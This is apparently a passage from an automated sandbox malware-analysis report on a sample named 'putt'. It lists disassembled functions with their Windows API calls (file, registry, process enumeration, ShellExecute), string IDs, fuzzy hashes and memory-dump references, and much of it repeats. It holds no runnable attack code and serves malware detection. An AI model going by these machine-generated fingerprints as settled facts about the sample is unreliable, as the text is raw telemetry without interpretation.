                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                              Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                              • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                              Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                              • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                              • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                              • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                              Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                              • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                              • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                              • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                              Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                              • String ID: F$N$open
                                                                                                                                                                                                                                                                              • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                              • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                              • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                              Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                              • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                              • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                                                                                                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                              Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
